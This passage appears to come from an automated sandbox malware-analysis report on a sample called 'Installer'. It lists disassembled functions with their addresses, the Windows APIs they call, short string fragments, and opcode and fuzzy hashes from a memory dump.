                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                                                                                                                                                                    • Instruction ID: 18454f57bc8bd7713fef9fb37d3191b327954915f6893786146af46e59a98f16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA01B53560E710DFC7188B24948093FB3B2FB9A324FA5556CD59123261D330ED028BCE
                                                                                                                                                                                                                                                    Function 00425DEA Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                                                                                                                                                                    • Instruction ID: 6fca0e276dc41d176f9258a46a62d3d95cdd6612b9affbec5bcc6b9929d5356f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001DF30A096209BC7088B14A48053FF3B2EF8B720FD5552DE68667251C335ED028B8E
                                                                                                                                                                                                                                                    Function 0043EC60 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                                                                                                                                                                    • Instruction ID: 79179b24096eac5e6ac07bd72d819e76adb0a4e00d37c96423816886d630571d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7012B3AA519904BC718CF39DC91AE573A1F797305F19A6BCC406E7274EE3499058B48
                                                                                                                                                                                                                                                    Function 00431D48 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                                                                                                                                                                    • API String ID: 2610073882-388534048
                                                                                                                                                                                                                                                    • Opcode ID: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                                                                                                                                                                    • Instruction ID: 0ed16d0090aa2853db3fa94cf8c83c94d7f5a066e2027e59c45352e3d5823b27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C415C612087C1CED725CF38C889346BFA2AB62314F08C69DD8E54F39BD279D516C762
                                                                                                                                                                                                                                                    Function 0043285B Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 96COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                                                                                                                                                                    • API String ID: 2610073882-388534048
                                                                                                                                                                                                                                                    • Opcode ID: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                                                                                                                                                                    • Instruction ID: cf5d184b347ae60a31a8e7b64644b3d0961cef50304e460fca956dadef895e24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F413C612087C08ED726CF3CC885346BFE1AB66314F08869DD8E58F39BD275D516C766
                                                                                                                                                                                                                                                    Function 0042DAFD Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: G$glhm$kdge
                                                                                                                                                                                                                                                    • API String ID: 3664257935-3790318392
                                                                                                                                                                                                                                                    • Opcode ID: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                                                                                                                                                                    • Instruction ID: bfd15d46e1ac39dd06e1a04889429419f0e65eafd70abaf615cf56b171db5900
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C451267060C3919FE311CB25D850B6BBFD0EFA6300F14486DF5C5AB392D2B98805CB56
                                                                                                                                                                                                                                                    Function 00424883 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004248C1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: ha$ha$q
                                                                                                                                                                                                                                                    • API String ID: 237503144-2525095540
                                                                                                                                                                                                                                                    • Opcode ID: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                                                                                                                                                                    • Instruction ID: c658e200b3172b2c4a4d6f089079a709458a382cdb7082564cb6dc42ecfb3a23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731D575A00211CFDB10CF98D881BAE7BB1FF49714F158079E914AF396DB75D8028B95
                                                                                                                                                                                                                                                    Function 0043403E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 9263576a989dd9e8dd5ba1139270ca0a2cd30e8eaf9ab1227e7a8ea63402d5a7
                                                                                                                                                                                                                                                    • Instruction ID: e93982ecca13eb1c7eb5bd9c416ca4066cf6d94eca1d44aa69bf2b87bfcca62b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9263576a989dd9e8dd5ba1139270ca0a2cd30e8eaf9ab1227e7a8ea63402d5a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931A3B49143548FDB00EFA8E98565DBBF0BB89704F11852EE498DB360D774A948CF86